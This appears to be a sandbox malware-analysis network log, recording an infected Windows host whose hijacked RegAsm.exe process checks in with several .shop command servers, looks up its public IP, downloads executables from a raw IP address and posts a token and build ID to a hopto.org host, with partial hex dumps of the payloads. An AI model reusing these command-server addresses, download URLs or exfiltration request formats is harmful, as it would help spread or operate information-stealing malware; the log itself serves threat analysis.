Sep 27, 2024 00:15:14.988368988 CEST	1236	IN	Data Raw: 58 12 40 00 08 00 01 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 02 00 34 00 64 50 40 00 09 43 6c 61 73 73 4e 61 6d 65 03 00 10 12 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 10 12 40 00 01 00 01 01 02 00 02 00 39 00 7c 50 40 00 0b Data Ascii: X@@Self4dP@ClassName@Self@@9\|P@ClassNameIs@Self@Name+Q@ClassParentX@Self)(T@ClassInfo@Self,TQ@InstanceSize@
Sep 27, 2024 00:15:14.988382101 CEST	1236	IN	Data Raw: 4d 65 73 73 61 67 65 02 00 02 00 3f 00 4c 54 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 03 00 00 00 00 00 08 00 02 08 d0 1b 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 2b 00 24 51 40 00 0b 4e Data Ascii: Message?LT@DefaultHandler@SelfMessage+$Q@NewInstance@Self,@Q@FreeInstance@Self'\|Q@Destroy@Self@@TObjectd@System@
Sep 27, 2024 00:15:14.988393068 CEST	1236	IN	Data Raw: 08 56 49 6e 74 65 67 65 72 02 00 54 11 40 00 08 00 00 00 02 07 56 53 69 6e 67 6c 65 02 00 78 11 40 00 08 00 00 00 02 07 56 44 6f 75 62 6c 65 02 00 88 11 40 00 08 00 00 00 02 09 56 43 75 72 72 65 6e 63 79 02 00 14 1e 40 00 08 00 00 00 02 05 56 44 Data Ascii: VIntegerT@VSinglex@VDouble@VCurrency@VDate@VOleStr@VDispatchl@VError@VBoolean@VUnknownd@VShortInt@VByte@VWord@
Sep 27, 2024 00:15:14.988398075 CEST	1236	IN	Data Raw: 25 78 c4 44 00 8b c0 ff 25 74 c4 44 00 8b c0 ff 25 70 c4 44 00 8b c0 ff 25 6c c4 44 00 8b c0 ff 25 68 c4 44 00 8b c0 ff 25 64 c4 44 00 8b c0 ff 25 60 c4 44 00 8b c0 ff 25 08 c4 44 00 8b c0 ff 25 5c c4 44 00 8b c0 ff 25 58 c4 44 00 8b c0 ff 25 54 Data Ascii: %xD%tD%pD%lD%hD%dD%`D%D%\D%XD%TD%D%D%D%PD%LD%D%D%D%HD%DD%@D%<D%8DS$DTBD$,t\$0D[@%4D
Sep 27, 2024 00:15:14.988435984 CEST	328	IN	Data Raw: fc 8b 0d 3c 7a 44 00 29 c8 01 ca eb b9 c3 90 53 8b d8 e8 8c ff ff ff 6a 04 68 00 10 00 00 68 f0 ff 13 00 6a 00 e8 ed fb ff ff 85 c0 74 4d 8b 15 28 7a 44 00 8b c8 c7 01 24 7a 44 00 a3 28 7a 44 00 89 51 04 89 02 8b d0 81 c2 f0 ff 13 00 8b ca 83 e9 Data Ascii: <zD)SjhhjtM(zD$zD(zDQ+<zD+8zD[3<zD3[=MpDt=)=xDu jD3tjlD3uSVWUNjhVj#
Sep 27, 2024 00:15:14.988578081 CEST	1236	IN	Data Raw: 89 14 24 8b 50 04 89 54 24 04 8b 50 0c f6 c2 08 75 1a 68 00 80 00 00 6a 00 56 e8 b8 fa ff ff 85 c0 74 04 33 ff eb 3f 83 cf ff eb 3a 8b de 8b ea 83 e5 f0 33 ff 6a 1c 8d 44 24 0c 50 53 e8 19 fa ff ff 68 00 80 00 00 6a 00 53 e8 88 fa ff ff 85 c0 75 Data Ascii: $PT$PuhjVt3?:3jD$PShjSut$;v+uD$$$T$PD$]_^[SVWU;;v$jD$PD$P{\|$upd$
Sep 27, 2024 00:15:14.988590956 CEST	1236	IN	Data Raw: ff ff c6 05 34 7a 44 00 00 5b c3 56 57 8d 3c cd c4 7a 44 00 8b 77 04 8b 46 04 89 47 04 89 38 39 c7 75 17 b8 fe ff ff ff d3 c0 21 04 95 44 7a 44 00 75 07 0f b3 15 40 7a 44 00 bf f0 ff ff ff 23 7e fc 89 fa 29 da 74 1f 8d 04 33 8d 4a 03 89 48 fc 89 Data Ascii: 4zD[VW<zDwFG89u!DzDu@zD#~)t3JHT0rd7KN4zD_^[[+1PSMpDuajBt,J@At1[KZJQS1[tBJHA19Su
Sep 27, 2024 00:15:14.993624926 CEST	1236	IN	Data Raw: 0f f4 ff ff 5a 59 89 c8 c1 e8 02 01 c8 31 ff 29 d0 83 d7 ff 21 f8 8d 84 02 d3 00 00 00 25 00 ff ff ff 83 c0 30 8d 55 04 29 c2 77 0b 83 24 2e f7 83 c5 04 eb 1e 90 90 89 54 2e fc 8d 7a 03 89 7c 30 fc 89 c5 81 fa 30 0b 00 00 72 07 01 f0 e8 00 f4 ff Data Ascii: ZY1)!%0U)w$.T.z\|00rn4zD]_^[4zD1)!RZt,vP]_^[^[%1SX`,sx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49728	104.26.13.205	80	6420	C:\Users\userBGIJEGCGDG.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:15:32.256066084 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Sep 27, 2024 00:15:32.723390102 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:32 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c969cfd287a4339-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Sep 27, 2024 00:15:36.571614027 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Sep 27, 2024 00:15:36.681541920 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:36 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c969d15ec074339-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49755	147.45.44.104	80	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:16:18.743643045 CEST	195	OUT	GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:16:19.368716002 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:19 GMT Content-Type: application/octet-stream Content-Length: 385064 Last-Modified: Thu, 26 Sep 2024 22:09:48 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5dbac-5e028" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$f> @ `S(& H.textD `.rsrc@@.reloc@B H0yYYlv^5fH$/Wazz5O7fSl\RBk5EqvBf9v;(F Jgi(BBMs<ub l]Qg\Bc$fVGZ.8lH;!"pUO8Y"d\dD"sm}c#?4?Y#0VSX\|G.g:!rM[~eBpbz{`5\|\|bOGAh}s
Sep 27, 2024 00:16:19.368746996 CEST	224	IN	Data Raw: 38 a0 ec cc 57 dc 50 61 47 3f b0 95 f7 55 f7 4b 25 ea 39 5d ff 7c 81 f9 ae 87 b6 77 63 5c 7c 9c e0 42 9a aa 4b 3d 9f 44 8d 15 75 0a 10 47 a3 40 b9 1d 71 fd 17 d3 79 30 67 e6 d1 e5 35 d8 ac 09 69 9a 8c a7 f3 13 a1 04 3c 06 74 5a e9 d0 02 51 13 87 Data Ascii: 8WPaG?UK%9]\|wc\\|BK=DuG@qy0g5i<tZQBg*M-jX=dI+:&zIj7eG@p)l{ >@~yM%H};7$lWdTtymhQQ;?(s
Sep 27, 2024 00:16:19.368760109 CEST	1236	IN	Data Raw: 78 e7 9d 1e 5f 2f b8 92 75 39 fc c3 b2 b9 62 c3 4f 5b 1f 70 6b 15 25 37 ab da 17 8b 4b 9a 27 05 cb e6 0c 9d 35 7f 58 60 d5 ad 85 8a 92 5f 79 18 cf 35 8f 7f 5b fe 6e 3c 7e ff 95 ba e3 6e c7 0d 89 04 8f 3e 69 27 25 68 d2 f4 1e b8 d7 88 6e 5f 75 ee Data Ascii: x_/u9bO[pk%7K'5X`_y5[n<~n>i'%hn_uRX0lvrJy,7)s;E4nv\|]5jK~ [ga`vOQ$N8WH <O$qXt+i(iG,)4B&^
Sep 27, 2024 00:16:19.368798018 CEST	1236	IN	Data Raw: dc 6b d9 68 84 e9 2a 73 94 3a a3 09 74 c5 94 e3 1d 03 5d e1 0b fd 5c 5b a7 4d a2 dd 78 0b 4b 0f c8 0c 54 a4 68 19 08 3b 3e 76 39 1e 6a 6e 92 a2 69 58 df b4 9a bc 23 6f 03 98 8a 89 d4 a7 d4 85 bc 55 3e fc 4c e0 54 17 3c 92 75 f1 1c 6b 2d 0e 27 dd Data Ascii: kh*s:t]\[MxKTh;>v9jniX#oU>LT<uk-'BwFF!D@qg]!Ni@jP2jswi}:Xd9j,;F@9Ar?OG!>3UDpL&EyY3e${>
Sep 27, 2024 00:16:19.368808985 CEST	1236	IN	Data Raw: 1e 24 06 99 fc 20 c4 cb b9 c7 87 89 76 03 56 90 a6 0a 95 71 f0 87 77 09 f5 a1 2d 9d 29 12 14 59 2c 3f c1 06 40 f2 9e 74 50 36 07 19 cc a3 6c 2b 11 02 6f 58 a5 c3 a9 47 d1 43 d2 a1 68 bc 5f 7c 52 05 07 65 94 24 b5 38 9f f7 3b 7c a0 2e 75 14 41 bc Data Ascii: $ vVqw-)Y,?@tP6l+oXGCh_\|Re$8;\|.uA0rE}D{zT%aYj\|]FHXkCR>ALDi?EtbY$Gs#vP)C+A<\|3fU8)rkqu)tuFj5Tro
Sep 27, 2024 00:16:19.368858099 CEST	1236	IN	Data Raw: f1 62 06 20 b1 c3 8f 6d d2 c4 24 fb 11 7e 51 fc b2 3e 5f 43 6d 8e 00 4a 44 54 1b af 32 da 1a 8b 11 d7 f2 a5 56 a5 4b e4 0e 00 fc 7d 00 c9 98 37 ab fc 59 ba ab d8 9d c1 0d 8e 1f 2e ac ae 9c 85 1a d3 d3 99 cb 1f cf c8 15 0f 4e 02 2d da e4 af 5c 2b Data Ascii: b m$~Q>_CmJDT2VK}7Y.N-\+AM}-7&~_>ard[:1@]u8Y7%;H=y/?dFfWXh];)K8Pnfj"mw2:SkAw(*o9%@6S&wOzj~A
Sep 27, 2024 00:16:19.368869066 CEST	1236	IN	Data Raw: e9 8d b7 f3 e8 49 94 76 99 da 1f 7f 00 66 6d 61 3b dd 85 b0 09 7a 31 57 cc 85 e6 d8 5f 71 97 18 dc 09 94 13 c3 09 70 86 e2 0d 24 56 87 a1 bd c0 6a 5a 50 be 65 52 b9 26 8a 99 ba 7d 52 ec 9f c5 23 90 ba fe dd 65 ba 3d 9e f8 f2 27 64 9c 5e 63 84 c7 Data Ascii: Ivfma;z1W_qp$VjZPeR&}R#e='d^c2?z"$_70)]wpd`>l-V~!;K<{J$i<Bi!bo7JMw<L^Ff&$K8S/DV[Rw29mT}
Sep 27, 2024 00:16:19.368880987 CEST	1236	IN	Data Raw: 59 59 80 93 8e 39 e1 57 80 56 78 a6 3d fd 03 2d a0 9f e9 20 93 b0 d9 12 6a b2 0d a4 14 4e aa ca a2 ae 7d 2d 2b 3b 31 48 08 2c 9c 5b 5f 37 6e da d8 5a 23 6c 1f 51 73 47 e1 f5 74 d7 27 9f e1 69 a4 1e 2d 3c bb 59 5a ee 67 d4 5a 6d c1 09 c3 28 13 81 Data Ascii: YY9WVx=- jN}-+;1H,[_7nZ#lQsGt'i-<YZgZm(v?P9<tN<Ia~N9?rm'# L${umjGB,Rv<(<o5d\|]Tf/Cy@_iM%~
Sep 27, 2024 00:16:19.368993044 CEST	776	IN	Data Raw: ae 35 5e 81 65 a8 8d b1 fa 06 94 05 d7 16 8f 98 6b b2 75 0d 69 a4 98 13 56 74 56 c3 2e 37 23 a0 3d 80 16 62 6d 90 b8 df 9c 89 45 fa 23 c1 ff 83 d3 5b 32 ef d4 0a e4 00 9b b8 71 2b f3 c4 e7 fa aa ba 7f 07 e1 96 cf a7 c5 fb c8 63 4d 34 d4 9b 30 61 Data Ascii: 5^ekuiVtV.7#=bmE#[2q+cM40a-,Rg:LT[@(RfWp)@#&0L_CuJ`,>h6s,P*/E1!~Tkg=gR<'NEZl<4SC
Sep 27, 2024 00:16:19.369019985 CEST	1236	IN	Data Raw: f0 14 b5 2a 0d 4e 8c 0d 55 37 d1 95 35 9a d7 5d fe 64 d2 5c 53 c6 2c 81 41 f1 69 e7 ac ac 20 6a 73 af 7d 89 95 c1 6e 52 b9 4c f8 25 47 51 81 28 38 51 79 29 45 cd 62 fb 6b 7b 20 e9 97 0f 26 25 44 c5 6f cc b4 7b 65 59 56 a3 62 44 78 47 63 c7 45 ea Data Ascii: NU75]d\S,Ai js}nRL%GQ(8Qy)Ebk{ &%Do{eYVbDxGcET5rTrCHLu0aiv.SbX!5y/;CBb7@v~n(uR+)VeL7SSF]R0>sPa=;7,mm:Xa
Sep 27, 2024 00:16:19.373883009 CEST	1236	IN	Data Raw: 6c 8f d7 a7 ce 7e 17 bc f2 0f ab 44 03 4d 75 3c 34 eb 2b 9d 6f 6f 0c b8 79 b7 6a 04 a3 e8 16 bd 8c b1 d8 c2 40 91 52 ae d2 c0 0e ef b5 87 4f 78 91 c3 5a 6a 12 5f 9d df 76 70 c5 d2 8f 1d 4c 4f 71 ee a2 c9 fd 82 61 92 eb 5d 78 a0 f7 c7 1a 04 9e 5d Data Ascii: l~DMu<4+ooyj@ROxZj_vpLOqa]x]8E^JI(hgD:kt.Tr}:@L6ok$75jce=wn'"a6;y&i.XRSL?CInu(4y.)^Nqhzk`f'nG])!=c/s
Sep 27, 2024 00:16:21.689908981 CEST	192	OUT	GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:16:21.874713898 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:21 GMT Content-Type: application/octet-stream Content-Length: 413224 Last-Modified: Thu, 26 Sep 2024 22:09:34 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5db9e-64e28" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf>< @@ `;S@((&`: H.textD `.rsrc@ @@.reloc`&@B <H0^8=.Qv A3[RJ_f9\lvC#SsnB~E~i7}+V#8f#XWb(<O1$=UN8)LL(K,r%9LY=0T4&d.(U'="(>d+92p81Pa\q]X/a@0CPQBv6le24I3PC:v}QwpS(AQg'N_XmvgJ/J6^D^MIO45+e^
Sep 27, 2024 00:16:23.846196890 CEST	188	OUT	GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 27, 2024 00:16:24.031522036 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:16:23 GMT Content-Type: application/octet-stream Content-Length: 73216 Last-Modified: Thu, 26 Sep 2024 22:01:15 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66f5d9ab-11e00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0" @@ `!S@` H.text `.rsrc@@@.reloc`@B!HtD%,("(6\|(0Vs1rp((2Js1s3(4Zrp((oE(N:rp(r&p((O(rp((rp(oE:rp(rp(rMp({rMp((RoS(Tb:rp(oU*0n(s(rpo(sooo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49767	45.132.206.251	80	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 00:16:27.185461998 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3217 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 00:16:27.185484886 CEST	3217	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------CFIEHCFIECBGCB
Sep 27, 2024 00:16:27.923572063 CEST	188	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 26 Sep 2024 22:16:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Served-By: cowod.hopto.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49710	172.67.194.216	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wallkedsleeoi.shop
2024-09-26 22:15:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:14 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=skfhkh0k6ncviiodr1idhbvrhn; expires=Mon, 20 Jan 2025 16:01:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2B7NdQoaM%2FRCa0ieWAe%2FB8Znx6kU2BuPx6VdSFJIHYzZ5EWZsRZUHV8i8zJz03tqnCEa1mdxYcGP1vGTvSbZ1VeBWJuIN5jUP7XLw06SrmswAT0WpHyM4PgdEjK5TdIbAoS79k4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c891c367c94-EWR
2024-09-26 22:15:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	104.21.4.136	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 22:15:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:16 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e8ogitu8s56o5377kmlghgkr7s; expires=Mon, 20 Jan 2025 16:01:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0t9%2BZvA%2B252P%2BjSRmxl%2FblHFcqqMlVjWdbsrKdgCh8nHsxG7auEFzR7G3Kf%2FCkRJ9HZ5%2BVTviPZQwc89Pvn%2BgGjRHqk4EKUQhTtZUhjEZby36iyVtRJQsENMCaXxOiC9Cpnlhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c8f4ec819db-EWR
2024-09-26 22:15:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	188.114.96.3	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 22:15:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:17 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pefbp830apsdkhp9hdl25rbqvn; expires=Mon, 20 Jan 2025 16:01:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POm9CN3e3ifAxMpXvbKPy9AcRxdSBXYUGAeqGupjL79KQXVIh%2FUWv3OyuFdShFdvZctMYIPH9ObiP9Swp4%2FtlZ7tkRs7yIZShjd%2F1ORUP2MCWKMEjgoGdGyjptanMD3ND%2FNZJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969c99addf78dc-EWR
2024-09-26 22:15:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 22:15:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	188.114.97.3	443	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:18 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 22:15:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 22:15:18 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 22:15:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fca0ugre3jgjokn7776ggu97qv; expires=Mon, 20 Jan 2025 16:01:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4yBQBc9aWxM3Zb0juGxWPvPMnPI%2FzeMWxhsiFLlxQXoc1rNEgGDf5t0ecBqPolXVKIwGD4sSy6wZL3PeJAOxO5BRp4MS%2FVKIvmoBmO%2FeTrzrCkHP%2F3I1LNqdcMtouapm1y0N7Xme"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c969ca40a0642bd-EWR
